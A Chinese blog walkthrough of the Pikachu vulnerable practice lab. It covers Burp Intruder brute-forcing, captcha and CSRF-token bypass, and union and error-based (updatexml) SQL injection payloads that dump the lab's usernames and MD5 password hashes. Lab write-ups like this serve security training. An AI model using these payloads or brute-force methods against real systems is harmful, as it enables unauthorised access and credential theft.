本文主要是介绍pikachu靶场,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
pikachu靶场
基于表单暴力破解
看一下界面,有两个输入框,使用暴力破解使用Cluster bomb
前提须知是
Sinper 对$$符号标记的数据进行逐个替换
Battering ram 对$$符号标记的数据同时替换
Pitchfork 多参数,使用不同字典
Cluster bomb 多参数做笛卡尔乘积模式爆破,多个位置,交叉组合
![image-20240106170922421](/images/baidian.png)
bp抓包,发送到intrude,修改标记内容
![image-20240106172837929](/images/baidian.png)
设置payloads,set 1 2 type设置为simple load字典 进行 start attack, 将length大小排序就出来了
![image-20240106173552716](/images/baidian.png)
![image-20240106173710480](/images/baidian.png)
验证码绕过(on server)
比上面多了一个验证码,用bp抓包看下
![image-20240106175349992](/images/baidian.png)
![image-20240106175447344](/images/baidian.png)
尝试了几次账号密码都没提示验证码的问题,说明验证码可以一直用,那就和上面思路一样暴力破解
![image-20240106180220452](/images/baidian.png)
验证码绕过(on client)
尝试输入,发现会有弹窗,那就是前端,查看前端关于验证码的代码,createCode()
![image-20240106180744168](/images/baidian.png)
老样子的配置进行,依旧成功,前端验证bp都能无视
![image-20240106181150699](/images/baidian.png)
token防爆破
一看没有验证码了,token搜索下含义,令牌,验证,防止csrf攻击,
![image-20240106181327759](/images/baidian.png)
尝试下bp显示csrf token error,每次token都会变
![image-20240106181732603](/images/baidian.png)
再尝试删除token,response中什么返回结果都没有,发现前端代码hidden,token,value的代码尝试是下一次的token
![image-20240106182058588](/images/baidian.png)
攻击模式选择Pitchfork,因为Cluster bomb是三组payload排列组合,所以使用一对一的
第三个payload type设置为Recursive grep
![image-20240106183022342](/images/baidian.png)
先在这个界面选择打勾然后add
双击下图value的内容就自动填写正则表达式了
![image-20240106182931544](/images/baidian.png)
![image-20240106182805463](/images/baidian.png)
还需要将线程设置为1,因为每次都要用上次response中返回的token,多线程就会乱
![image-20240106183153247](/images/baidian.png)
最后一步开跑就结束了
![image-20240106181150699](/images/baidian.png)
数字型注入
看一下源码,没有任何处理,那直接bp抓包修改
![image-20240106151935487](/images/baidian.png)
id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
发现order by 3 报错,order by2 正常,字段数就是2
![image-20240106152129838](/images/baidian.png)
正常走流程爆库
id=1 union select 1,database()#
pikachu
![image-20240106152230550](/images/baidian.png)
爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106153135338](/images/baidian.png)
爆字段
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#
id,userid,ipaddress,useragent,httpaccept,remoteport,id,username,pw,sex,phonenum,address,email,id,content,time,id,username,password,level,id,time,content,name
![image-20240106153628531](/images/baidian.png)
下面就是字段里的数据了
1 union select username,password from users#
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03
像是md5解码,md5在线解密下
123456
000000
abc123
![image-20240106154303478](/images/baidian.png)
字符型注入
看一下源码,需要考虑闭合是单引号
![image-20240106154748027](/images/baidian.png)
输入万能注入,有变化证明语句正确
1' or 1=1#
![image-20240106160648855](/images/baidian.png)
判断字段数,道理同数字型注入
1' order by 2#
![image-20240106161105159](/images/baidian.png)
爆库
1' union select 1,database()#
pikachu
![image-20240106161441309](/images/baidian.png)
爆表
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106161626457](/images/baidian.png)
爆字段
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
![image-20240106161930701](/images/baidian.png)
爆值
1' union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
同理用md5解密
XX型注入
查看源码,单引号和括号
![image-20240106162921052](/images/baidian.png)
尝试一下
1') or 1=1#
成功了,按照流程继续
![image-20240106163010759](/images/baidian.png)
爆库
1') union select 1,database()#
pikachu
![image-20240106163204223](/images/baidian.png)
爆表
1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106163542815](/images/baidian.png)
爆字段
1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
![image-20240106163650158](/images/baidian.png)
爆值
1') union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
搜索型注入
查看源码,单引号和百分号
![image-20240106164830745](/images/baidian.png)
1%' or 1=1#
成功了,那还是老流程
![image-20240106165729611](/images/baidian.png)
判断字段数,这个是到4才显示错误
1%' order by 4#
字段数就是3了
![image-20240106165854525](/images/baidian.png)
爆库
1%' union select 1,2,database()#
pikachu
![image-20240106170035180](/images/baidian.png)
爆表
1%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind
![image-20240106170318503](/images/baidian.png)
爆字段
1%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
![image-20240106170604331](/images/baidian.png)
爆值
1%' union select username,password,3 from users#
username:admin
uid:e10adc3949ba59abbe56e057f20f883e
email is: 3
username:pikachu
uid:670b14728ad9902aecba32e22fa4f6bd
email is: 3
username:test
uid:e99a18c428cb38d5f260853678922e03
email is: 3
![image-20240106170727433](/images/baidian.png)
"insert/update"注入
查看源码,会对字符进行转义,联合注入就不能用了,进行报错注入
![image-20240108155928405](/images/baidian.png)
bp在注册界面抓包,爆库
1' or updatexml(1,concat(0x7e,database()),1) or'
![image-20240108170743140](/images/baidian.png)
爆表
1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) or'
![image-20240108170849529](/images/baidian.png)
爆字段
1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or'
![image-20240108171315501](/images/baidian.png)
爆值
1' or updatexml(1,concat(0x7e,(select group_concat(username,'@',password)from pikachu.users)),1) or'
![image-20240108172516526](/images/baidian.png)
"delete"注入
查看源代码,
![image-20240108174822691](/images/baidian.png)
File inclusion(local)
先查看源码,无限制,
![image-20240111135440561](/images/baidian.png)
这篇关于pikachu靶场的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!